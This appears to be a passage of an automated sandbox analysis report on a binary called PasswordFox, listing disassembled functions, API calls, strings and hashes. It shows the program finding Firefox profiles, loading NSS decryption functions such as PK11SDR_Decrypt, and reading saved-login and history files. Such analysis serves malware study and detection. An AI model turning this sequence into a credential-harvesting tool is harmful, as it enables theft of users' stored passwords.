                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileFindwcslen$FirstNext
                                        • String ID:
                                        • API String ID: 2163959949-0
                                        • Opcode ID: e58e1da017f2d9b9f2487bc1bcf131eac75da02d1244eea9b71b4f5dc18f09ad
                                        • Instruction ID: 72756ae5bf3a82a9770dd2a85ed3f342837e44ccf599ea45002739566ca04d91
                                        • Opcode Fuzzy Hash: e58e1da017f2d9b9f2487bc1bcf131eac75da02d1244eea9b71b4f5dc18f09ad
                                        • Instruction Fuzzy Hash: F011C272505604AED320DB64D884A9B73DCEF44324F204A3FF45AE31C1EB38A9008F69
                                        Function 0040955B Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 162COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 004025F0: LoadLibraryW.KERNEL32(comctl32.dll), ref: 0040260F
                                          • Part of subcall function 004025F0: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00402621
                                          • Part of subcall function 004025F0: FreeLibrary.KERNEL32(00000000), ref: 00402635
                                          • Part of subcall function 004025F0: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00402660
                                        • SetErrorMode.KERNELBASE(00008001), ref: 00409583
                                        • GetModuleHandleW.KERNEL32(00000000,0040AC82,00000000), ref: 0040959C
                                        • EnumResourceTypesW.KERNEL32(00000000), ref: 004095A3
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,/deleteregkey,/savelangfile), ref: 0040961A
                                        • DeleteObject.GDI32(?), ref: 00409634
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Library$??3@AddressDeleteEnumErrorFreeHandleLoadMessageModeModuleObjectProcResourceTypes
                                        • String ID: $/deleteregkey$/savelangfile
                                        • API String ID: 3591293073-28296030
                                        • Opcode ID: d4026ab066b5786ef66ee6970bd6b009e7292194a54210e320ad5b8e2977d184
                                        • Instruction ID: 178a9fccab303593a6279fae082693933da09ea4deade59eeb096ff544fa0fd7
                                        • Opcode Fuzzy Hash: d4026ab066b5786ef66ee6970bd6b009e7292194a54210e320ad5b8e2977d184
                                        • Instruction Fuzzy Hash: 95516071408346DBD720AFA1DD88A5FBBE8FF85344F00093EF585A2192D7799805CF9A
                                        Function 00409EBB Relevance: 42.1, APIs: 16, Strings: 8, Instructions: 124libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • memset.MSVCRT ref: 00409EDC
                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,00000000), ref: 00409F25
                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,00000000), ref: 00409F32
                                        • memset.MSVCRT ref: 00409F4C
                                        • wcslen.MSVCRT ref: 00409F59
                                        • wcslen.MSVCRT ref: 00409F68
                                        • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00409FA3
                                        • LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 00409FBF
                                        • LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 00409FD6
                                        • GetProcAddress.KERNEL32(?,NSS_Init), ref: 00409FEB
                                        • GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 00409FF7
                                        • GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040A003
                                        • GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040A00F
                                        • GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040A01B
                                        • GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040A027
                                        • GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 0040A033
                                          • Part of subcall function 0040353E: memset.MSVCRT ref: 0040355F
                                          • Part of subcall function 0040353E: memset.MSVCRT ref: 004035AC
                                          • Part of subcall function 0040353E: RegCloseKey.ADVAPI32(?), ref: 004036DF
                                          • Part of subcall function 0040353E: wcscpy.MSVCRT ref: 004036ED
                                          • Part of subcall function 0040353E: ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104), ref: 00403704
                                          • Part of subcall function 0040353E: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104), ref: 00403740
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$memset$CurrentDirectory$LibraryLoadwcslen$CloseEnvironmentExpandHandleModuleStringswcscpy
                                        • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
                                        • API String ID: 2554026968-4029219660
                                        • Opcode ID: 9ef94111156cac9d1b3b72124b0fa32533121e735b70d91af15a6f43e3620ccd
                                        • Instruction ID: 5684c35a9538609956853511e72be201b8ec69360c76df797af2ef85c1c6d806
                                        • Opcode Fuzzy Hash: 9ef94111156cac9d1b3b72124b0fa32533121e735b70d91af15a6f43e3620ccd
                                        • Instruction Fuzzy Hash: 62418271940308AACB20DF61CC8599AB7F9FF58344F10497FE585E21D2E7789A888B5D
                                        Function 00403E9B Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 224COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 71 403e9b-403ebd call 409ebb 73 403ec2-403ec4 71->73 74 404162 73->74 75 403eca-403efc memset WideCharToMultiByte 73->75 78 40416a-404174 74->78 76 403f08 75->76 77 403efe-403f06 75->77 79 403f0b-403f0d 76->79 77->79 81 403f13-403f9d memset * 4 wcslen * 2 79->81 82 404158-404160 79->82 83 403fb7 81->83 84 403f9f-403fb5 call 40468e 81->84 85 404146-404148 82->85 86 403fbf-403fdc wcslen * 2 83->86 84->86 85->78 87 40414a-404156 SetCurrentDirectoryW 85->87 89 403ff6 86->89 90 403fde-403ff4 call 40468e 86->90 87->78 93 403ffe-40401b wcslen * 2 89->93 90->93 95 404035 93->95 96 40401d-404033 call 40468e 93->96 98 40403d-40405a wcslen * 2 95->98 96->98 100 404074 98->100 101 40405c-404072 call 40468e 98->101 103 40407c-40408e call 404530 100->103 101->103 107 404090-4040a6 call 403a29 103->107 108 4040ab-4040bb call 404530 103->108 113 404135-40413e 107->113 114 4040d5-4040e5 call 404530 108->114 115 4040bd-4040d0 call 403c5b 108->115 116 404140 113->116 117 404142 113->117 121 4040e7-4040fa call 403c5b 114->121 122 4040ff-40410f call 404530 114->122 115->114 116->117 117->85 121->122 126 404111-404124 call 403c5b 122->126 127 404129-40412b 122->127 126->127 127->113 129 40412d 127->129 129->113
                                        APIs
                                          • Part of subcall function 00409EBB: memset.MSVCRT ref: 00409EDC
                                          • Part of subcall function 00409EBB: GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,00000000), ref: 00409F25
                                          • Part of subcall function 00409EBB: SetCurrentDirectoryW.KERNEL32(?,?,?,00000000), ref: 00409F32
                                          • Part of subcall function 00409EBB: memset.MSVCRT ref: 00409F4C
                                          • Part of subcall function 00409EBB: wcslen.MSVCRT ref: 00409F59
                                          • Part of subcall function 00409EBB: wcslen.MSVCRT ref: 00409F68
                                          • Part of subcall function 00409EBB: GetModuleHandleW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00409FA3
                                          • Part of subcall function 00409EBB: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 00409FBF
                                          • Part of subcall function 00409EBB: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 00409FD6
                                          • Part of subcall function 00409EBB: GetProcAddress.KERNEL32(?,NSS_Init), ref: 00409FEB
                                          • Part of subcall function 00409EBB: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 00409FF7
                                          • Part of subcall function 00409EBB: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040A003
                                          • Part of subcall function 00409EBB: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040A00F
                                          • Part of subcall function 00409EBB: GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040A01B
                                        • memset.MSVCRT ref: 00403EDA
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000), ref: 00403EF1
                                        • memset.MSVCRT ref: 00403F2A
                                        • memset.MSVCRT ref: 00403F44
                                        • memset.MSVCRT ref: 00403F5E
                                        • memset.MSVCRT ref: 00403F78
                                        • wcslen.MSVCRT ref: 00403F83
                                        • wcslen.MSVCRT ref: 00403F91
                                        • wcslen.MSVCRT ref: 00403FC2
                                        • wcslen.MSVCRT ref: 00403FD0
                                        • wcslen.MSVCRT ref: 00404001
                                        • wcslen.MSVCRT ref: 0040400F
                                        • wcslen.MSVCRT ref: 00404040
                                        • wcslen.MSVCRT ref: 0040404E
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0040414E
                                          • Part of subcall function 00403A29: memset.MSVCRT ref: 00403A68
                                          • Part of subcall function 00403A29: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,00000000,00000000), ref: 00403A81
                                          • Part of subcall function 00403A29: memset.MSVCRT ref: 00403AF2
                                          • Part of subcall function 00403A29: memset.MSVCRT ref: 00403B07
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: memsetwcslen$AddressProc$CurrentDirectory$ByteCharLibraryLoadMultiWide$HandleModule
                                        • String ID: signons.sqlite$signons.txt$signons2.txt$signons3.txt
                                        • API String ID: 909768024-2435954524
                                        • Opcode ID: 2cd41763164bfc268848fe1a4c35ae9e78612bbf97f8d55e22d6e3cbca22dac0
                                        • Instruction ID: c203f00cef873be9fb78cde1de6421f2abdb522e40cfef1996789d219aa531ea
                                        • Opcode Fuzzy Hash: 2cd41763164bfc268848fe1a4c35ae9e78612bbf97f8d55e22d6e3cbca22dac0
                                        • Instruction Fuzzy Hash: D47173B2408345ABC720EF51DC8199B77EDEF84315F10093EFA88F61D1E7399A548B5A
                                        Function 0040353E Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 170registrytimeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 130 40353e-403592 memset call 40a9bf 133 4036e5-4036f7 wcscpy 130->133 134 403598-4035bf memset 130->134 135 403757-403762 133->135 136 4036f9-403714 ExpandEnvironmentStringsW call 403473 133->136 137 4036c9-4036d6 call 40aa59 134->137 142 403716 136->142 143 403719-40371c 136->143 144 4035c4-4035dc _wcsnicmp 137->144 145 4036dc-4036df RegCloseKey 137->145 142->143 143->135 146 40371e-40372f call 404571 call 403473 143->146 147 4035e2-40365b memset * 2 _snwprintf call 40aa15 wcsrchr 144->147 148 4036bc-4036c6 144->148 145->133 160 403731 146->160 161 403734-403738 146->161 153 403661-403669 147->153 154 40365d 147->154 148->137 156 4036ba 153->156 157 40366b-40367c call 403473 153->157 154->153 156->148 157->156 165 40367e-40368d CompareFileTime 157->165 160->161 163 403755 161->163 164 40373a-403749 GetCurrentDirectoryW call 403473 161->164 163->135 169 40374e-403750 164->169 167 403699-4036b7 wcscpy 165->167 168 40368f-403697 165->168 167->156 168->156 168->167 169->163 170 403752 169->170 170->163
                                        APIs
                                        • memset.MSVCRT ref: 0040355F
                                          • Part of subcall function 0040A9BF: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040358D,80000002,SOFTWARE\Mozilla,?), ref: 0040A9D2
                                        • _wcsnicmp.MSVCRT ref: 004035D2
                                        • memset.MSVCRT ref: 004035F6
                                        • memset.MSVCRT ref: 00403612
                                        • _snwprintf.MSVCRT ref: 00403632
                                        • wcsrchr.MSVCRT ref: 00403651
                                        • CompareFileTime.KERNEL32(?,?), ref: 00403685
                                        • wcscpy.MSVCRT ref: 004036A7
                                        • memset.MSVCRT ref: 004035AC
                                          • Part of subcall function 0040AA59: RegEnumKeyExW.ADVAPI32(00000000,?,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0040AA7C
                                        • RegCloseKey.ADVAPI32(?), ref: 004036DF
                                        • wcscpy.MSVCRT ref: 004036ED
                                        • ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104), ref: 00403704
                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104), ref: 00403740
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: memset$wcscpy$CloseCompareCurrentDirectoryEnumEnvironmentExpandFileOpenStringsTime_snwprintf_wcsnicmpwcsrchr
                                        • String ID: %programfiles%\Mozilla Firefox$%s\bin$SOFTWARE\Mozilla$mozilla
                                        • API String ID: 1094916163-3304446826
                                        • Opcode ID: d87aefb1ff376ea55b32d79d498fb8176b26e42b29f7c254c3bd9a02580b83b6
                                        • Instruction ID: e48ef5db9bdb8b4a7d99f75cc5e27f3a554516f7c19b45dad1929bcfdf1d344f
                                        • Opcode Fuzzy Hash: d87aefb1ff376ea55b32d79d498fb8176b26e42b29f7c254c3bd9a02580b83b6
                                        • Instruction Fuzzy Hash: 195143B2900219AADB60EFA1DC85ADF7BBCAF04314F0005B6F904B6191E7749B84CB99
                                        Function 0040B50C Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 171 40b50c-40b526 call 40b720 GetModuleHandleA 174 40b547-40b54a 171->174 175 40b528-40b533 171->175 176 40b573-40b5c2 __set_app_type __p__fmode __p__commode call 40b71a 174->176 175->174 177 40b535-40b53e 175->177 186 40b5d0-40b626 call 40b708 _initterm __wgetmainargs _initterm 176->186 187 40b5c4-40b5cf __setusermatherr 176->187 178 40b540-40b545 177->178 179 40b55f-40b563 177->179 178->174 181 40b54c-40b553 178->181 179->174 182 40b565-40b567 179->182 181->174 184 40b555-40b55d 181->184 185 40b56d-40b570 182->185 184->185 185->176 190 40b636-40b63d 186->190 191 40b628-40b631 186->191 187->186 192 40b684-40b688 190->192 193 40b63f-40b64a 190->193 194 40b6f0-40b6f5 call 40b759 191->194 197 40b68a-40b68f 192->197 198 40b65d-40b663 192->198 195 40b652-40b656 193->195 196 40b64c-40b650 193->196 195->198 200 40b658-40b65a 195->200 196->193 196->195 197->192 201 40b665-40b669 198->201 202 40b66b-40b67c GetStartupInfoW 198->202 200->198 201->200 201->202 204 40b691-40b693 202->204 205 40b67e-40b682 202->205 206 40b694-40b6ac GetModuleHandleA call 40955b 204->206 205->206 209 40b6b5-40b6ee _cexit 206->209 210 40b6ae-40b6af exit 206->210 209->194 210->209
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                        • String ID:
                                        • API String ID: 2827331108-0
                                        • Opcode ID: 33ca073d47c7302e7342fcea8aba624dc4a35c459148cc5e94e9aeb5e10264c8
                                        • Instruction ID: e01cd669bdb7fb49093a9b6ff8a530008b0410016245136eb8964f66b7eabaf2
                                        • Opcode Fuzzy Hash: 33ca073d47c7302e7342fcea8aba624dc4a35c459148cc5e94e9aeb5e10264c8
                                        • Instruction Fuzzy Hash: 2A519071C40205EFCB20AFA4D988AAE77B4FB44314F20867BE855B72D1D7794982CB9D
                                        Function 00408A99 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 105COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileModuleNamememsetwcscatwcsrchr
                                        • String ID: .cfg$/installfolder$/master$/profile
                                        • API String ID: 776488737-2817415528
                                        • Opcode ID: 1385d99f9d3117933856bbdb45573c7bccc4cd1af43ce7ebd9ff815b7821104c
                                        • Instruction ID: c9699089a678a890fee6dac8cdd7aa88665331595cdb8f284d7a2e663852b7aa
                                        • Opcode Fuzzy Hash: 1385d99f9d3117933856bbdb45573c7bccc4cd1af43ce7ebd9ff815b7821104c
                                        • Instruction Fuzzy Hash: 3341B3725001159BDB10EF51DC85ACA73A9EF44314F1840BABD0CBB2C3DB7DAA948BA9
                                        Function 00409857 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 96COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 249 409857-409879 call 404d72 call 409a7a 254 409981-40998d call 404d94 249->254 255 40987f-409884 249->255 256 409889-4098cb memset call 404e5c wcslen * 2 255->256 261 4098e0 256->261 262 4098cd-4098de call 40468e 256->262 264 4098e8-4098f7 call 404530 261->264 262->264 268 409908-409931 call 404e5c wcslen * 2 264->268 269 4098f9-409903 call 404dba 264->269 273 409933-409948 call 40468e 268->273 274 40994a 268->274 269->268 276 409952-409961 call 404530 273->276 274->276 280 409972-40997b 276->280 281 409963-40996d call 404dba 276->281 280->254 280->256 281->280
                                        APIs
                                          • Part of subcall function 00409A7A: memset.MSVCRT ref: 00409A96
                                          • Part of subcall function 00409A7A: memset.MSVCRT ref: 00409AAB
                                          • Part of subcall function 00409A7A: wcscat.MSVCRT ref: 00409AD1
                                          • Part of subcall function 00409A7A: wcscat.MSVCRT ref: 00409AF7
                                        • memset.MSVCRT ref: 0040989F
                                        • wcslen.MSVCRT ref: 004098B6
                                        • wcslen.MSVCRT ref: 004098BE
                                        • wcslen.MSVCRT ref: 00409917
                                        • wcslen.MSVCRT ref: 00409925
                                          • Part of subcall function 0040468E: wcscpy.MSVCRT ref: 00404696
                                          • Part of subcall function 0040468E: wcscat.MSVCRT ref: 004046A5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: wcslen$memsetwcscat$wcscpy
                                        • String ID: history.dat$places.sqlite
                                        • API String ID: 2541527827-467022611
                                        • Opcode ID: 078acf5595006b25e19b26cec781eadeda02e5e83cd21b058ea400ee59bb81ae
                                        • Instruction ID: 26d80f911a766dcbd1c55f55748fd8c9ad000421fe116896cc75fe1ca070082e
                                        • Opcode Fuzzy Hash: 078acf5595006b25e19b26cec781eadeda02e5e83cd21b058ea400ee59bb81ae
                                        • Instruction Fuzzy Hash: ED313871D04219AACF10FBA5DC45ADDB7B8AF44319F20847BE514F21C2EB7C9A49CB58
                                        Function 0040ACCC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 283 40accc-40ace3 call 40ac9d 286 40ace5-40acee call 404659 283->286 287 40acf7-40ad28 memset call 40a9bf 283->287 296 40acf5 286->296 292 40ad2a-40ad5c wcscpy call 40a9d9 RegCloseKey 287->292 293 40ad5d-40ad71 wcscpy 287->293 292->293 295 40ad74-40ad76 293->295 296->295
                                        APIs
                                          • Part of subcall function 0040AC9D: LoadLibraryW.KERNEL32(shell32.dll,0040957E), ref: 0040ACAB
                                          • Part of subcall function 0040AC9D: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040ACC0
                                        • memset.MSVCRT ref: 0040AD0B
                                        • wcscpy.MSVCRT ref: 0040AD34
                                        • RegCloseKey.ADVAPI32(?,?,?,?,00000208,?,?,?,?,?,00000000), ref: 0040AD56
                                        • wcscpy.MSVCRT ref: 0040AD65
                                          • Part of subcall function 00404659: GetVersionExW.KERNEL32(0040FA78,00000208,0040ACEA,00000000), ref: 00404673
                                        Strings
                                        • AppData, xrefs: 0040AD2E
                                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040AD14
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: wcscpy$AddressCloseLibraryLoadProcVersionmemset
                                        • String ID: AppData$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                        • API String ID: 288233908-3974836871
                                        • Opcode ID: 575bda5dc03a994884795237ba0a5972980a742fe3d38205ca00784e16b8d47f
                                        • Instruction ID: e2d1ccaa5822a8973fc9891ee3d502f62366d36d26647b53b469a464e62ee2b9
                                        • Opcode Fuzzy Hash: 575bda5dc03a994884795237ba0a5972980a742fe3d38205ca00784e16b8d47f
                                        • Instruction Fuzzy Hash: 8C01E1B1941208FADB10B7A49D4ADAE737CDB44304F200077B906B10C2E6795B949AAA
                                        Function 004092DD Relevance: 9.1, APIs: 6, Instructions: 77windowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 298 4092dd-409305 ??2@YAPAXI@Z 299 409323 298->299 300 409307-409321 298->300 301 409325-409338 ??2@YAPAXI@Z 299->301 300->301 302 409341 301->302 303 40933a-40933f call 4024f9 301->303 305 409343-409351 302->305 303->305 307 409360-4093df call 404633 call 401000 GetModuleHandleW LoadIconW call 4017ce call 4097c9 wcsrchr 305->307 308 409353-40935a DeleteObject 305->308 317 4093e1 307->317 318 4093e4-4093eb 307->318 308->307 317->318
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(00000C30,00000000,?,?,?,?,004095D3), ref: 004092FD
                                        • ??2@YAPAXI@Z.MSVCRT(0000050C,00000000,?,?,?,?,004095D3), ref: 00409330
                                        • DeleteObject.GDI32(?), ref: 00409354
                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,004095D3), ref: 0040939A
                                        • LoadIconW.USER32(00000000,00000065), ref: 004093A3
                                        • wcsrchr.MSVCRT ref: 004093D6
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ??2@$DeleteHandleIconLoadModuleObjectwcsrchr
                                        • String ID:
                                        • API String ID: 829242273-0
                                        • Opcode ID: b6872d8eefeebd306552a5b8be504b41ed2c6867e2c7576c2d210665d0b67c59
                                        • Instruction ID: a7972903ae27a6600f95bbd13b710df1722676e02896d0f0998b2b2f089c8b71
